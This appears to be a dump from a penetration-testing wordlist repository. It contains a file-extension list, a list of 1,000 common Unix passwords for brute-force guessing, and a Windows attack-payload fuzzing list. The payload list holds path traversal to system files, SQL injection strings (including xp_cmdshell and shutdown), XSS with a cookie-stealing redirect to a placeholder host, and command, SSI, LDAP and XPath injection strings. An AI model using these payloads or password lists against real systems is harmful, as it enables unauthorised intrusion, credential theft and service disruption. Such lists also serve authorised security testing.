627 | pdd
628 | pdm
629 | pds
630 | pdx
631 | pea
632 | peb
633 | pec
634 | pep
635 | pet
636 | pex
637 | pf
638 | pfc
639 | pfl
640 | phb
641 | phm
642 | pi
643 | pim
644 | pis
645 | pit
646 | piz
647 | pjx
648 | pka
649 | pkb
650 | pkg
651 | pkh
652 | pks
653 | pkt
654 | pln
655 | plw
656 | pmo
657 | pmr
658 | pnproj
659 | pnpt
660 | pns
661 | pnt
662 | pod
663 | poi
664 | pos
665 | postal
666 | pot
667 | potm
668 | potx
669 | pp2
670 | ppf
671 | pps
672 | ppsx
673 | ppt
674 | pptm
675 | pptx
676 | prc
677 | pre
678 | prf
679 | prj
680 | prm
681 | prs
682 | psa
683 | psf
684 | psm
685 | pst
686 | ptb
687 | ptf
688 | ptk
689 | ptm
690 | ptn
691 | ptt
692 | ptz
693 | pup
694 | puz
695 | pvl
696 | pwa
697 | pwd
698 | pxj
699 | pxl
700 | q07
701 | q08
702 | q09
703 | q3d
704 | qbw
705 | qda
706 | qdat
707 | qdf
708 | qdfm
709 | qel
710 | qfx
711 | qif
712 | qpb
713 | qpf
714 | qph
715 | qpm
716 | qpw
717 | qrp
718 | qsd
719 | r0
720 | r00
721 | r01
722 | r02
723 | r03
724 | r1
725 | r2
726 | r30
727 | ral
728 | rar
729 | rbt
730 | rcd
731 | rcg
732 | rdb
733 | rdf
734 | rdx
735 | ref
736 | ret
737 | rev
738 | rf1
739 | rfa
740 | rfo
741 | rge
742 | rgn
743 | rgo
744 | rk
745 | rmuf
746 | rnc
747 | rnq
748 | rod
749 | rog
750 | roi
751 | rou
752 | rp9
753 | rpm
754 | rpp
755 | rpt
756 | rrt
757 | rsc
758 | rsd
759 | rsw
760 | rte
761 | rvt
762 | rwg
763 | rz
764 | rzb
765 | rzs
766 | s00
767 | s01
768 | s02
769 | s7z
770 | s85
771 | saf
772 | sam07
773 | sar
774 | sav
775 | sbd
776 | sbf
777 | sbq
778 | sbt
779 | sca
780 | scf
781 | sch
782 | sdb
783 | sdc
784 | sdf
785 | sdn
786 | sdp
787 | sdq
788 | sds
789 | sea
790 | sen
791 | seo
792 | seq
793 | ser
794 | sfs
795 | sfx
796 | sgml
797 | sgn
798 | sh
799 | shar
800 | shk
801 | shp
802 | shr
803 | shs
804 | shx
805 | sit
806 | sitx
807 | skc
808 | skv
809 | skx
810 | sle
811 | slk
812 | slp
813 | snapfireshow
814 | sonic
815 | soundpack
816 | spo
817 | sps
818 | spt
819 | spub
820 | spv
821 | sq
822 | sqd
823 | sql
824 | sqlite
825 | sqr
826 | sqx
827 | sqz
828 | sta
829 | stc
830 | stf
831 | stk
832 | stl
833 | stm
834 | stp
835 | str
836 | stt
837 | stw
838 | styk
839 | stykz
840 | swk
841 | sxc
842 | sxi
843 | sy3
844 | t01
845 | t02
846 | t03
847 | t04
848 | t05
849 | t06
850 | t07
851 | t08
852 | t09
853 | t2
854 | t3001
855 | tar
856 | tar.gz
857 | tar.xz
858 | tax2008
859 | tax2009
860 | taz
861 | tb
862 | tbk
863 | tbl
864 | tbz
865 | tbz2
866 | tcc
867 | tcx
868 | tda
869 | tdl
870 | tdm
871 | tdt
872 | te
873 | te3
874 | teacher
875 | tef
876 | tet
877 | tfa
878 | tfd
879 | tfrd
880 | tg
881 | tgz
882 | tjp
883 | tk3
884 | tkfl
885 | tlz
886 | tlzma
887 | tmw
888 | tol
889 | topc
890 | tpb
891 | tps
892 | tr3
893 | tra
894 | trd
895 | trk
896 | trs
897 | trx
898 | tst
899 | tsv
900 | ttk
901 | txa
902 | txd
903 | txf
904 | txz
905 | tz
906 | uc2
907 | uccapilog
908 | ud
909 | udb
910 | udeb
911 | uds
912 | uha
913 | ulf
914 | ulz
915 | update
916 | upoi
917 | usr
918 | uvf
919 | uwl
920 | val
921 | vbpf1
922 | vcd
923 | vce
924 | vcf
925 | vcs
926 | vdb
927 | vdx
928 | vem
929 | vfs
930 | vi
931 | vip
932 | vle
933 | vlg
934 | vmt
935 | voi
936 | vok
937 | vrd
938 | vscontent
939 | vsi
940 | vsx
941 | vtx
942 | vxml
943 | w02
944 | wab
945 | wad
946 | war
947 | wb1
948 | wb2
949 | wb3
950 | wdb
951 | wdq
952 | wea
953 | wfd
954 | wfm
955 | wgp
956 | wgt
957 | windowslivecontact
958 | wjr
959 | wk1
960 | wk2
961 | wk3
962 | wk4
963 | wk5
964 | wke
965 | wki
966 | wks
967 | wku
968 | wlmp
969 | wmdb
970 | wor
971 | wot
972 | wpc
973 | wpf
974 | wpo
975 | wq1
976 | wq2
977 | wtb
978 | wtr
979 | xbk
980 | xdb
981 | xdp
982 | xds
983 | xef
984 | xem
985 | xez
986 | xfd
987 | xfo
988 | xft
989 | xl
990 | xlc
991 | xlgc
992 | xlr
993 | xls
994 | xlsb
995 | xlsm
996 | xlsx
997 | xlt
998 | xltm
999 | xltx
1000 | xlw
1001 | xmcd
1002 | xmcdz
1003 | xml
1004 | xmlper
1005 | xmpz
1006 | xpg
1007 | xpi
1008 | xpj
1009 | xpm
1010 | xpt
1011 | xrp
1012 | xsl
1013 | xslt
1014 | xsn
1015 | xtm
1016 | xtp
1017 | xx
1018 | xxd
1019 | xz
1020 | y
1021 | yam
1022 | yz
1023 | z
1024 | z01
1025 | z02
1026 | z03
1027 | z04
1028 | zap
1029 | zdb
1030 | zdc
1031 | zfsendtotarget
1032 | zip
1033 | zipx
1034 | zix
1035 | zmc
1036 | zoo
1037 | zpi
1038 | zpl
1039 | zz
1040 |
--------------------------------------------------------------------------------
/wordlists-user-passwd/unix-os/unix_passwords.txt:
--------------------------------------------------------------------------------
1 | 123456
2 | 12345
3 | 123456789
4 | password
5 | iloveyou
6 | princess
7 | 1234567
8 | 12345678
9 | abc123
10 | nicole
11 | daniel
12 | babygirl
13 | monkey
14 | lovely
15 | jessica
16 | 654321
17 | michael
18 | ashley
19 | qwerty
20 | 111111
21 | iloveu
22 | 000000
23 | michelle
24 | tigger
25 | sunshine
26 | chocolate
27 | password1
28 | soccer
29 | anthony
30 | friends
31 | butterfly
32 | purple
33 | angel
34 | jordan
35 | liverpool
36 | justin
37 | loveme
38 | fuckyou
39 | 123123
40 | football
41 | secret
42 | andrea
43 | carlos
44 | jennifer
45 | joshua
46 | bubbles
47 | 1234567890
48 | superman
49 | hannah
50 | amanda
51 | loveyou
52 | pretty
53 | basketball
54 | andrew
55 | angels
56 | tweety
57 | flower
58 | playboy
59 | hello
60 | elizabeth
61 | hottie
62 | tinkerbell
63 | charlie
64 | samantha
65 | barbie
66 | chelsea
67 | lovers
68 | teamo
69 | jasmine
70 | brandon
71 | 666666
72 | shadow
73 | melissa
74 | eminem
75 | matthew
76 | robert
77 | danielle
78 | forever
79 | family
80 | jonathan
81 | 987654321
82 | computer
83 | whatever
84 | dragon
85 | vanessa
86 | cookie
87 | naruto
88 | summer
89 | sweety
90 | spongebob
91 | joseph
92 | junior
93 | softball
94 | taylor
95 | yellow
96 | daniela
97 | lauren
98 | mickey
99 | princesa
100 | alexandra
101 | alexis
102 | jesus
103 | estrella
104 | miguel
105 | william
106 | thomas
107 | beautiful
108 | mylove
109 | angela
110 | poohbear
111 | patrick
112 | iloveme
113 | sakura
114 | adrian
115 | alexander
116 | destiny
117 | christian
118 | 121212
119 | sayang
120 | america
121 | dancer
122 | monica
123 | richard
124 | 112233
125 | princess1
126 | 555555
127 | diamond
128 | carolina
129 | steven
130 | rangers
131 | louise
132 | orange
133 | 789456
134 | 999999
135 | shorty
136 | 11111
137 | nathan
138 | snoopy
139 | gabriel
140 | hunter
141 | cherry
142 | killer
143 | sandra
144 | alejandro
145 | buster
146 | george
147 | brittany
148 | alejandra
149 | patricia
150 | rachel
151 | tequiero
152 | 7777777
153 | cheese
154 | 159753
155 | arsenal
156 | dolphin
157 | antonio
158 | heather
159 | david
160 | ginger
161 | stephanie
162 | peanut
163 | blink182
164 | sweetie
165 | 222222
166 | beauty
167 | 987654
168 | victoria
169 | honey
170 | 00000
171 | fernando
172 | pokemon
173 | maggie
174 | corazon
175 | chicken
176 | pepper
177 | cristina
178 | rainbow
179 | kisses
180 | manuel
181 | myspace
182 | rebelde
183 | angel1
184 | ricardo
185 | babygurl
186 | heaven
187 | 55555
188 | baseball
189 | martin
190 | greenday
191 | november
192 | alyssa
193 | madison
194 | mother
195 | 123321
196 | 123abc
197 | mahalkita
198 | batman
199 | september
200 | december
201 | morgan
202 | mariposa
203 | maria
204 | gabriela
205 | iloveyou2
206 | bailey
207 | jeremy
208 | pamela
209 | kimberly
210 | gemini
211 | shannon
212 | pictures
213 | asshole
214 | sophie
215 | jessie
216 | hellokitty
217 | claudia
218 | babygirl1
219 | angelica
220 | austin
221 | mahalko
222 | victor
223 | horses
224 | tiffany
225 | mariana
226 | eduardo
227 | andres
228 | courtney
229 | booboo
230 | kissme
231 | harley
232 | ronaldo
233 | iloveyou1
234 | precious
235 | october
236 | inuyasha
237 | peaches
238 | veronica
239 | chris
240 | 888888
241 | adriana
242 | cutie
243 | james
244 | banana
245 | prince
246 | friend
247 | jesus1
248 | crystal
249 | celtic
250 | zxcvbnm
251 | edward
252 | oliver
253 | diana
254 | samsung
255 | freedom
256 | angelo
257 | kenneth
258 | master
259 | scooby
260 | carmen
261 | 456789
262 | sebastian
263 | rebecca
264 | jackie
265 | spiderman
266 | christopher
267 | karina
268 | johnny
269 | hotmail
270 | 0123456789
271 | school
272 | barcelona
273 | august
274 | orlando
275 | samuel
276 | cameron
277 | slipknot
278 | cutiepie
279 | monkey1
280 | 50cent
281 | bonita
282 | kevin
283 | bitch
284 | maganda
285 | babyboy
286 | casper
287 | brenda
288 | adidas
289 | kitten
290 | karen
291 | mustang
292 | isabel
293 | natalie
294 | cuteako
295 | javier
296 | 789456123
297 | 123654
298 | sarah
299 | bowwow
300 | portugal
301 | laura
302 | 777777
303 | marvin
304 | denise
305 | tigers
306 | volleyball
307 | jasper
308 | january
309 | fuckoff
310 | alicia
311 | nicholas
312 | flowers
313 | cristian
314 | tintin
315 | bianca
316 | chrisbrown
317 | chester
318 | 101010
319 | smokey
320 | silver
321 | internet
322 | sweet
323 | strawberry
324 | garfield
325 | dennis
326 | panget
327 | francis
328 | cassie
329 | benfica
330 | love123
331 | 696969
332 | asdfgh
333 | lollipop
334 | olivia
335 | cancer
336 | camila
337 | qwertyuiop
338 | superstar
339 | harrypotter
340 | ihateyou
341 | charles
342 | monique
343 | midnight
344 | vincent
345 | christine
346 | apples
347 | scorpio
348 | jordan23
349 | lorena
350 | andreea
351 | mercedes
352 | katherine
353 | charmed
354 | abigail
355 | rafael
356 | icecream
357 | mexico
358 | brianna
359 | nirvana
360 | aaliyah
361 | pookie
362 | johncena
363 | lovelove
364 | fucker
365 | abcdef
366 | benjamin
367 | 131313
368 | gangsta
369 | brooke
370 | 333333
371 | hiphop
372 | aaaaaa
373 | mybaby
374 | sergio
375 | welcome
376 | metallica
377 | julian
378 | travis
379 | myspace1
380 | babyblue
381 | sabrina
382 | michael1
383 | jeffrey
384 | stephen
385 | love
386 | dakota
387 | catherine
388 | badboy
389 | fernanda
390 | westlife
391 | blondie
392 | sasuke
393 | smiley
394 | jackson
395 | simple
396 | melanie
397 | steaua
398 | dolphins
399 | roberto
400 | fluffy
401 | teresa
402 | piglet
403 | ronald
404 | slideshow
405 | asdfghjkl
406 | minnie
407 | newyork
408 | jason
409 | raymond
410 | santiago
411 | jayson
412 | 88888888
413 | 5201314
414 | jerome
415 | gandako
416 | muffin
417 | gatita
418 | babyko
419 | 246810
420 | sweetheart
421 | chivas
422 | ladybug
423 | kitty
424 | popcorn
425 | alberto
426 | valeria
427 | cookies
428 | leslie
429 | jenny
430 | nicole1
431 | 12345678910
432 | leonardo
433 | jayjay
434 | liliana
435 | dexter
436 | sexygirl
437 | 232323
438 | amores
439 | christ
440 | babydoll
441 | anthony1
442 | marcus
443 | bitch1
444 | fatima
445 | miamor
446 | lover
447 | chris1
448 | single
449 | eeyore
450 | lalala
451 | 252525
452 | scooter
453 | natasha
454 | skittles
455 | brooklyn
456 | colombia
457 | 159357
458 | teddybear
459 | winnie
460 | happy
461 | manutd
462 | 123456a
463 | britney
464 | katrina
465 | christina
466 | pasaway
467 | cocacola
468 | mahal
469 | grace
470 | linda
471 | albert
472 | tatiana
473 | london
474 | cantik
475 | 0123456
476 | lakers
477 | marie
478 | teiubesc
479 | 147258369
480 | charlotte
481 | natalia
482 | francisco
483 | amorcito
484 | smile
485 | paola
486 | angelito
487 | manchester
488 | hahaha
489 | elephant
490 | mommy1
491 | shelby
492 | 147258
493 | kelsey
494 | genesis
495 | amigos
496 | snickers
497 | xavier
498 | turtle
499 | marlon
500 | linkinpark
501 | claire
502 | stupid
503 | 147852
504 | marina
505 | garcia
506 | fuckyou1
507 | diego
508 | brandy
509 | letmein
510 | hockey
511 | 444444
512 | sharon
513 | bonnie
514 | spider
515 | iverson
516 | andrei
517 | justine
518 | frankie
519 | pimpin
520 | disney
521 | rabbit
522 | 54321
523 | fashion
524 | soccer1
525 | red123
526 | bestfriend
527 | england
528 | hermosa
529 | 456123
530 | qazwsx
531 | bandit
532 | danny
533 | allison
534 | emily
535 | 102030
536 | lucky1
537 | sporting
538 | miranda
539 | dallas
540 | hearts
541 | camille
542 | wilson
543 | potter
544 | pumpkin
545 | iloveu2
546 | number1
547 | katie
548 | guitar
549 | 212121
550 | truelove
551 | jayden
552 | savannah
553 | hottie1
554 | phoenix
555 | monster
556 | player
557 | ganda
558 | people
559 | scotland
560 | nelson
561 | jasmin
562 | timothy
563 | onelove
564 | ilovehim
565 | shakira
566 | estrellita
567 | bubble
568 | smiles
569 | brandon1
570 | sparky
571 | barney
572 | sweets
573 | parola
574 | evelyn
575 | familia
576 | love12
577 | nikki
578 | motorola
579 | florida
580 | omarion
581 | monkeys
582 | loverboy
583 | elijah
584 | joanna
585 | canada
586 | ronnie
587 | mamita
588 | emmanuel
589 | thunder
590 | 999999999
591 | broken
592 | rodrigo
593 | maryjane
594 | westside
595 | california
596 | lucky
597 | mauricio
598 | yankees
599 | jackass
600 | jamaica
601 | justin1
602 | amigas
603 | preciosa
604 | shopping
605 | flores
606 | mariah
607 | matrix
608 | isabella
609 | tennis
610 | trinity
611 | jorge
612 | sunflower
613 | kathleen
614 | bradley
615 | cupcake
616 | hector
617 | martinez
618 | elaine
619 | robbie
620 | friendster
621 | cheche
622 | gracie
623 | connor
624 | hello1
625 | valentina
626 | melody
627 | darling
628 | sammy
629 | jamie
630 | santos
631 | abcdefg
632 | joanne
633 | candy
634 | fuckyou2
635 | loser
636 | dominic
637 | pebbles
638 | sunshine1
639 | swimming
640 | millie
641 | loving
642 | gangster
643 | blessed
644 | compaq
645 | taurus
646 | gloria
647 | tyler
648 | aaron
649 | darkangel
650 | kitkat
651 | megan
652 | dreams
653 | sweetpea
654 | bettyboop
655 | jessica1
656 | cynthia
657 | cheyenne
658 | ferrari
659 | dustin
660 | iubire
661 | a123456
662 | snowball
663 | purple1
664 | violet
665 | darren
666 | starwars
667 | bestfriends
668 | inlove
669 | kelly
670 | batista
671 | karla
672 | sophia
673 | chacha
674 | biteme
675 | marian
676 | sydney
677 | sexyme
678 | pogiako
679 | gerald
680 | jordan1
681 | 010203
682 | daddy1
683 | zachary
684 | daddysgirl
685 | billabong
686 | carebear
687 | froggy
688 | pinky
689 | erika
690 | oscar
691 | skater
692 | raiders
693 | nenita
694 | tigger1
695 | ashley1
696 | charlie1
697 | gatito
698 | lokita
699 | maldita
700 | buttercup
701 | nichole
702 | bambam
703 | nothing
704 | glitter
705 | bella
706 | amber
707 | apple
708 | 123789
709 | sister
710 | zacefron
711 | tokiohotel
712 | loveya
713 | lindsey
714 | money
715 | lovebug
716 | bubblegum
717 | marissa
718 | dreamer
719 | darkness
720 | cecilia
721 | lollypop
722 | nicolas
723 | google
724 | lindsay
725 | cooper
726 | passion
727 | kristine
728 | green
729 | puppies
730 | ariana
731 | fuckme
732 | chubby
733 | raquel
734 | lonely
735 | anderson
736 | sammie
737 | sexybitch
738 | mario
739 | butter
740 | willow
741 | roxana
742 | mememe
743 | caroline
744 | susana
745 | kristen
746 | baller
747 | hotstuff
748 | carter
749 | stacey
750 | babylove
751 | angelina
752 | miller
753 | scorpion
754 | sierra
755 | playgirl
756 | sweet16
757 | 012345
758 | bhebhe
759 | gustavo
760 | marcos
761 | chance
762 | 123qwe
763 | kayla
764 | james1
765 | football1
766 | eagles
767 | loveme1
768 | milagros
769 | stella
770 | lilmama
771 | beyonce
772 | lovely1
773 | daddy
774 | catdog
775 | armando
776 | margarita
777 | 151515
778 | loves
779 | lolita
780 | 202020
781 | gerard
782 | undertaker
783 | amistad
784 | williams
785 | qwerty1
786 | freddy
787 | capricorn
788 | caitlin
789 | bryan
790 | delfin
791 | dance
792 | cheerleader
793 | password2
794 | PASSWORD
795 | martha
796 | lizzie
797 | georgia
798 | matthew1
799 | enrique
800 | zxcvbn
801 | badgirl
802 | andrew1
803 | 141414
804 | 11111111
805 | dancing
806 | cuteme
807 | booger
808 | amelia
809 | vampire
810 | skyline
811 | chiquita
812 | angeles
813 | scoobydoo
814 | janine
815 | tamara
816 | carlitos
817 | money1
818 | sheila
819 | justme
820 | ireland
821 | kittycat
822 | hotdog
823 | yamaha
824 | tristan
825 | harvey
826 | israel
827 | legolas
828 | michelle1
829 | maddie
830 | angie
831 | cinderella
832 | jesuschrist
833 | lester
834 | ashton
835 | ilovejesus
836 | tazmania
837 | remember
838 | xxxxxx
839 | tekiero
840 | thebest
841 | princesita
842 | lucky7
843 | jesucristo
844 | peewee
845 | paloma
846 | buddy1
847 | deedee
848 | miriam
849 | april
850 | patches
851 | regina
852 | janice
853 | cowboys
854 | myself
855 | lipgloss
856 | jazmin
857 | rosita
858 | happy1
859 | felipe
860 | chichi
861 | pangit
862 | mierda
863 | genius
864 | 741852963
865 | hernandez
866 | awesome
867 | walter
868 | tinker
869 | arturo
870 | silvia
871 | melvin
872 | celeste
873 | pussycat
874 | gorgeous
875 | david1
876 | molly
877 | honeyko
878 | mylife
879 | animal
880 | penguin
881 | babyboo
882 | loveu
883 | simpsons
884 | lupita
885 | boomer
886 | panthers
887 | hollywood
888 | alfredo
889 | musica
890 | johnson
891 | ilovegod
892 | hawaii
893 | sparkle
894 | kristina
895 | sexymama
896 | crazy
897 | valerie
898 | spencer
899 | scarface
900 | hardcore
901 | 098765
902 | 00000000
903 | winter
904 | hailey
905 | trixie
906 | hayden
907 | micheal
908 | wesley
909 | 242424
910 | 0987654321
911 | marisol
912 | nikita
913 | daisy
914 | jeremiah
915 | pineapple
916 | mhine
917 | isaiah
918 | christmas
919 | cesar
920 | lolipop
921 | butterfly1
922 | chloe
923 | lawrence
924 | xbox360
925 | sheena
926 | murphy
927 | madalina
928 | anamaria
929 | gateway
930 | debbie
931 | yourmom
932 | blonde
933 | jasmine1
934 | please
935 | bubbles1
936 | jimmy
937 | beatriz
938 | poopoo
939 | diamonds
940 | whitney
941 | friendship
942 | sweetness
943 | pauline
944 | desiree
945 | trouble
946 | 741852
947 | united
948 | marley
949 | brian
950 | barbara
951 | hannah1
952 | bananas
953 | julius
954 | leanne
955 | sandy
956 | marie1
957 | anita
958 | lover1
959 | chicago
960 | twinkle
961 | pantera
962 | february
963 | birthday
964 | shadow1
965 | qwert
966 | bebita
967 | 87654321
968 | twilight
969 | imissyou
970 | pollito
971 | ashlee
972 | tucker
973 | cookie1
974 | shelly
975 | catalina
976 | 147852369
977 | beckham
978 | simone
979 | nursing
980 | iloveyou!
981 | eugene
982 | torres
983 | damian
984 | 123123123
985 | joshua1
986 | bobby
987 | babyface
988 | andre
989 | donald
990 | daniel1
991 | panther
992 | dinamo
993 | mommy
994 | juliana
995 | cassandra
996 | trustno1
997 | sexylady
998 | 14344
999 | autumn
1000 | mendoza
1001 |
--------------------------------------------------------------------------------
/常用攻击载荷/all-attacks-win.txt:
--------------------------------------------------------------------------------
1 | # a wide sample of malicious input for Windows targets
2 | A
3 | TRUE
4 | FALSE
5 | 0
6 | 00
7 | 1
8 | -1
9 | 1.0
10 | -1.0
11 | 2
12 | -2
13 | -20
14 | 65536
15 | 268435455
16 | -268435455
17 | 2147483647
18 | 0xfffffff
19 | NULL
20 | null
21 | \0
22 | \00
23 | < script > < / script>
24 | %0a
25 | %00
26 | +%00
27 | \0
28 | \0\0
29 | \0\0\0
30 | \00
31 | \00\00
32 | \00\00\00
33 | $null
34 | $NULL
35 | `dir`
36 | \nnetstat -a%\n
37 | \"blah
38 | |dir|
39 | ";id"
40 | dir%00
41 | dir%00|
42 | |dir
43 | |dir|
44 | |/bin/ls -al
45 | ?x=
46 | ?x="
47 | ?x=|
48 | ?x=>
49 | /boot.ini
50 | ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
51 | ../../boot.ini
52 | /../../../../../../../../%2A
53 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
54 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
55 | /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
56 | ../../../../../../../../conf/server.xml
57 | C:/inetpub/wwwroot/global.asa
58 | C:\inetpub\wwwroot\global.asa
59 | C:/boot.ini
60 | C:\boot.ini
61 | ../../../../../../../../../../../../localstart.asp%00
62 | ../../../../../../../../../../../../localstart.asp
63 | ../../../../../../../../../../../../boot.ini%00
64 | ../../../../../../../../../../../../boot.ini
65 | /./././././././././././boot.ini
66 | /../../../../../../../../../../../boot.ini%00
67 | /../../../../../../../../../../../boot.ini
68 | /..\../..\../..\../..\../..\../..\../boot.ini
69 | /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
70 | \..\..\..\..\..\..\..\..\..\..\boot.ini
71 | ..\..\..\..\..\..\..\..\..\..\boot.ini%00
72 | ..\..\..\..\..\..\..\..\..\..\boot.ini
73 | /../../../../../../../../../../../boot.ini%00.html
74 | /../../../../../../../../../../../boot.ini%00.jpg
75 | /.../.../.../.../.../
76 | ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
77 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
78 | %0d%0aX-Injection-Header:%20AttackValue
79 | !@#0%^#0##018387@#0^^**(()
80 | %01%02%03%04%0a%0d%0aADSF
81 | /,%ENV,/
82 | <!--#exec%20cmd="dir"-->
83 | <!--#exec%20cmd="dir"-->
84 | %
85 | #
86 | *
87 | }
88 | ;
89 | /
90 | \
91 | \\
92 | \\/
93 | \\\\*
94 | \\\\?\\
95 | <
96 | <
97 | <
98 | <
99 | <
100 | <<
101 | <<<
102 | |
103 | ||
104 | `
105 | -
106 | --
107 | *|
108 | ^'
109 | \'
110 | /'
111 | @'
112 | (')
113 | {'}
114 | [']
115 | *'
116 | #'
117 | !'
118 | !@#$%%^#$%#$@#$%$$@#$%^^**(()
119 | %01%02%03%04%0a%0d%0aADSF
120 | \t
121 | "\t"
122 |
123 |
124 |
125 |
126 | #xD
127 | #xA
128 | #xD#xA
129 | #xA#xD
130 | /%00/
131 | %00/
132 | %00
133 |
134 | %3C
135 | %3C%3F
136 | %60
137 | %5C
138 | %5C/
139 | %7C
140 | %00
141 | /%2A
142 | %2A
143 | %2C
144 | %20
145 | %20|
146 | %250a
147 | %2500
148 | ../
149 | %2e%2e%2f
150 | ..%u2215
151 | ..%c0%af
152 | ..%bg%qf
153 | ..\
154 | ..%5c
155 | ..%%35c
156 | ..%255c
157 | ..%%35%63
158 | ..%25%35%63
159 | ..%u2216
160 | <
161 | <
162 | <
163 | <
164 | <
165 | <
166 | <
167 | <
168 | <
169 | <
170 | <
171 | <
172 | <
173 | <
174 | <
175 | <
176 | <
177 | <
178 | <
179 | <
180 | <
181 | <
182 | <
183 | <
184 | <
185 | <
186 | <
187 | <
188 | <
189 | <
190 | <
191 | <
192 | <
193 | <
194 | <
195 | <
196 | <
197 | <
198 | <
199 | <
200 | <
201 | <
202 | <
203 | <
204 | <
205 | <
206 | <
207 | <
208 | <
209 | <
210 | <
211 | <
212 | <
213 | <
214 | <
215 | <
216 | <
217 | <
218 | <
219 | <
220 | \x3c
221 | \x3C
222 | \u003c
223 | \u003C
224 | something%00html
225 | '
226 | /'
227 | \'
228 | ^'
229 | @'
230 | {'}
231 | [']
232 | *'
233 | #'
234 | ">xxxyyy
235 | ">
237 | <
238 |
239 | '>
240 | '>
241 | \";alert('XSS');//
242 | %3cscript%3ealert("XSS");%3c/script%3e
243 | %3cscript%3ealert(document.cookie);%3c%2fscript%3e
244 | %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
245 | <script>alert(document.cookie);
246 | <script>alert(document.cookie);<script>alert
247 |
248 |
249 |
250 |
252 |
253 |
254 |
255 | ">
256 |
257 |
258 |
259 |
260 |
261 |
262 |
263 |
264 |
265 |
266 |
267 |
268 |
269 | '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
270 | ">
271 | %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
272 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//>!--=&{}
273 | '';!--"=&{()}
274 |
275 | '
276 | "
277 | #
278 | -
279 | --
280 | ' --
281 | --';
282 | ' ;
283 | = '
284 | = ;
285 | = --
286 | \x23
287 | \x27
288 | \x3D \x3B'
289 | \x3D \x27
290 | \x27\x4F\x52 SELECT *
291 | \x27\x6F\x72 SELECT *
292 | 'or select *
293 | admin'--
294 | ';shutdown--
295 | <>"'%;)(&+
296 | ' or ''='
297 | ' or 'x'='x
298 | " or "x"="x
299 | ') or ('x'='x
300 | 0 or 1=1
301 | ' or 0=0 --
302 | " or 0=0 --
303 | or 0=0 --
304 | ' or 0=0 #
305 | " or 0=0 #
306 | or 0=0 #
307 | ' or 1=1--
308 | " or 1=1--
309 | ' or '1'='1'--
310 | "' or 1 --'"
311 | or 1=1--
312 | or%201=1
313 | or%201=1 --
314 | ' or 1=1 or ''='
315 | " or 1=1 or ""="
316 | ' or a=a--
317 | " or "a"="a
318 | ') or ('a'='a
319 | ") or ("a"="a
320 | hi" or "a"="a
321 | hi" or 1=1 --
322 | hi' or 1=1 --
323 | hi' or 'a'='a
324 | hi') or ('a'='a
325 | hi") or ("a"="a
326 | 'hi' or 'x'='x';
327 | @variable
328 | ,@variable
329 | PRINT
330 | PRINT @@variable
331 | select
332 | insert
333 | as
334 | or
335 | procedure
336 | limit
337 | order by
338 | asc
339 | desc
340 | delete
341 | update
342 | distinct
343 | having
344 | truncate
345 | replace
346 | like
347 | handler
348 | bfilename
349 | ' or username like '%
350 | ' or uname like '%
351 | ' or userid like '%
352 | ' or uid like '%
353 | ' or user like '%
354 | exec xp
355 | exec sp
356 | '; exec master..xp_cmdshell
357 | '; exec xp_regread
358 | t'exec master..xp_cmdshell 'nslookup www.google.com'--
359 | --sp_password
360 | \x27UNION SELECT
361 | ' UNION SELECT
362 | ' UNION ALL SELECT
363 | ' or (EXISTS)
364 | ' (select top 1
365 | '||UTL_HTTP.REQUEST
366 | 1;SELECT%20*
367 | to_timestamp_tz
368 | tz_offset
369 | <>"'%;)(&+
370 | '%20or%201=1
371 | %27%20or%201=1
372 | %20$(sleep%2050)
373 | %20'sleep%2050'
374 | char%4039%41%2b%40SELECT
375 | '%20OR
376 | 'sqlattempt1
377 | (sqlattempt2)
378 | |
379 | %7C
380 | *|
381 | %2A%7C
382 | *(|(mail=*))
383 | %2A%28%7C%28mail%3D%2A%29%29
384 | *(|(objectclass=*))
385 | %2A%28%7C%28objectclass%3D%2A%29%29
386 | (
387 | %28
388 | )
389 | %29
390 | &
391 | %26
392 | !
393 | %21
394 | ' or 1=1 or ''='
395 | ' or ''='
396 | x' or 1=1 or 'x'='y
397 | /
398 | //
399 | //*
400 | */*
401 | @*
402 | count(/child::node())
403 | x' or name()='username' or 'x'='y
404 | ','')); phpinfo(); exit;/*
405 | var n=0;while(true){n++;}]]>
406 | SCRIPT]]>alert('XSS');/SCRIPT]]>
407 | SCRIPT]]>alert('XSS');/SCRIPT]]>
408 |
409 | ]>&xxe;
410 | ]>&xxe;
411 | ]>&xxe;
412 | ]>&xxe;
413 | ]]>
414 | <IMG SRC="javascript:alert('XSS')">
415 |
416 | XSS
417 |
418 | '
419 | '--
420 | ' or 1=1--
421 | 1 or 1=1--
422 | ' or 1 in (@@version)--
423 | 1 or 1 in (@@version)--
424 | '; waitfor delay '0:30:0'--
425 | 1; waitfor delay '0:30:0'--
426 | '||Utl_Http.request('http://') from dual--
427 | 1||Utl_Http.request('http://') from dual--
428 | xsstest
429 | xsstest%00"<>'
430 |
431 |
432 | ))))))))))
433 | ../../../../../../../../../../boot.ini
434 | ..\..\..\..\..\..\..\..\..\..\boot.ini
435 | ../../../../../../../../../../windows/win.ini
436 | ..\..\..\..\..\..\..\..\..\..\windows\win.ini
437 | || ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
438 | | ping -i 30 127.0.0.1 |
